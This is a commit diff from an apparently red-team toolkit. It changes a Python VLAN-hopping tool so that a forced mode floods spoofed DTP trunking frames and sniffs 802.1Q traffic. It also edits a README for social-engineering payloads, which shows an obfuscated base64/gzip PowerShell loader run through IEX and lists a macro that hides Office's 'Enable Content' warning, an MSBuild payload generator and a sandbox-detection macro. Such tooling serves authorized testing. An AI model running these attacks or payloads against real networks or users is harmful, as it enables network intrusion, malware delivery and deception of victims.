VLANHopper got improved a bit

networks/VLANHopperDTP.py

@@ -274,7 +274,7 @@ def floodTrunkingRequests():
         Logger.dbg('SENT: DTP Trunk Keep-Alive:\n{}'.format(frame.summary()))
         send(frame, iface = config['interface'], verbose = False)
 
-        time.sleep(30)
+        time.sleep(config['timeout'] / 3)
 
 def engageDot1qSniffer():
     global dot1qSnifferStarted
@@ -335,6 +335,17 @@ def processDtps(dtps):
             attackEngaged = True
             time.sleep(5)
 
+    if config['force']:
+        Logger.ok('FORCED VLAN Hopping via Switch Spoofing.')
+        Logger.ok('Flooding with fake Access/Desirable DTP frames...\n')
+
+        t = threading.Thread(target = floodTrunkingRequests)
+        t.daemon = True
+        t.start()
+
+        attackEngaged = True
+        time.sleep(5)
+
     if attackEngaged:
         engageDot1qSniffer()
             
@@ -385,7 +396,7 @@ def addVlanIface(vlan):
         tempfiles.append(pidFile)
         tempfiles.append(dbFile)
 
-        Logger.info('So far so good, subinterface {} added.'.format(subif))
+        Logger.dbg('So far so good, subinterface {} added.'.format(subif))
 
         ret = False
         for attempt in range(3):
@@ -456,7 +467,7 @@ def sniffThread():
 
         if len(dtps) > 0 or config['force']:
             if len(dtps) > 0:
-                Logger.dbg('Got {} DTP frames.\n'.format(
+                Logger.info('Got {} DTP frames.\n'.format(
                     len(dtps)
                 ))
             else:
@@ -572,6 +583,9 @@ def parseOptions(argv):
     config['commands'] = args.command
     config['exitcommands'] = args.exitcommand
 
+    if args.force:
+        config['timeout'] = 30
+
     return args
 
 def main(argv):

social-engineering/README.md

@@ -14,6 +14,8 @@ $s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e
 IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
 ```
 
+- **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c))
+
 - **`generateMSBuildPowershellXML.py`** - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using `powershell.exe` ([gist](https://gist.github.com/mgeeky/df9f313cfe468e56c59268b958319bcb))
 
     Example output **not minimized**:
@@ -101,8 +103,6 @@ ngTask></Project>
 ------------------------------------------------------------------------------------                              
 ```
 
-- **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c))
-
 - **`Invoke-Command-Cred-Example.ps1`** - Example of using PSRemoting with credentials passed directly from command line. ([gist](https://gist.github.com/mgeeky/de4ecf952ddce774d241b85cfbf97faf))
 
 - **`MacroDetectSandbox.vbs`** - Visual Basic script responsible for detecting Sandbox environments, as presented in modern Trojan Droppers implemented in Macros. ([gist](https://gist.github.com/mgeeky/61e4dfe305ab719e9874ca442779a91d))